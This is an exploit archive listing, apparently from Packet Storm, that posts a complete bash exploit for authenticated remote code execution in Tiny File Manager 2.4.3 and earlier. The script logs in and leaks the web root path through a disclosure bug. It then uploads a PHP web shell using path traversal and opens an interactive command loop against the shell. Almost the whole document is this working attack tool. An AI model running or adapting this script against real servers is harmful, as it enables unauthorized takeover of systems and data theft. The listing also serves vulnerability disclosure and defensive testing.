exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tiny File Manager 2.4.3 Shell Upload

Tiny File Manager 2.4.3 Shell Upload
Posted Feb 16, 2022
Authored by FEBIN | Site github.com

Tiny File Manager versions 2.4.3 and below authenticated remote shell upload exploit.

tags | exploit, remote, shell
SHA-256 | 69dbb94d1909075eb94a1fcbf3173a05e4fe3288578480701de9efad6606ce3f

Tiny File Manager 2.4.3 Shell Upload

Change Mirror Download
# Tiny File Manager <= 2.4.3 Authenticated RCE exploit
# By FEBIN
# ./exploit.sh <URL> <Admin Username> <Password>
# Example: ./exploit.sh http://files.ubuntu.local/index.php admin "admin@123"
# https://github.com/febinrev/tinyfilemanager-2.4.3-exploit
#
#!/bin/bash

check(){

which curl
if [ $? = 0 ]
then
printf "[✔] Curl found! \n"
else
printf "[❌] Curl not found! \n"
exit
fi

which jq
if [ $? = 0 ]
then
printf "[✔] jq found! \n"
else
printf "[❌] jq not found! \n"
exit
fi
}
usage(){

printf "
TIny File Manager Authenticated RCE POC Exploit.

By FEBIN

$0 <URL> <Admin Username> <Password>

Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\"

"
}

log-in(){
URL=$1
admin=$2
pass=$3
cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)

if [ $cookie ]
then
printf "\n[+] Login Success! Cookie: $cookie \n"
else
printf "\n[-] Logn Failed! \n"
fi

URL=${URL}
}

find_webroot(){


webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" )


if [ $webroot ]
then
printf "\n[*] Try to Leak Web root directory path \n\n"
printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n"
else
printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
webroot="/var/www/html"
fi
}

upload(){

#webroot="/var/www/tiny/"
shell="shell$RANDOM.php"
echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell



curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful"


}

exploit(){

WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/")

upload


if [ $? = 0 ]
then
printf "[+] File Upload Successful! \n"
else
printf "[-] File Upload Unsuccessful! Exiting! \n"
exit 1
fi


printf "[+] Checking for the shell \n"


curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null
if [ $? = 0 ]
then
printf "[+] Shell found ${WEB_URL}/$shell \n"
else
printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
exit 2
fi

printf "[+] Getting shell access! \n\n"

while true
do
printf "$> "
read cmd
curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"
done
}

if [ $1 ] && [ $2 ] && [ $3 ]
then
check
log-in $1 $2 $3

find_webroot


exploit
else
usage
fi


Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close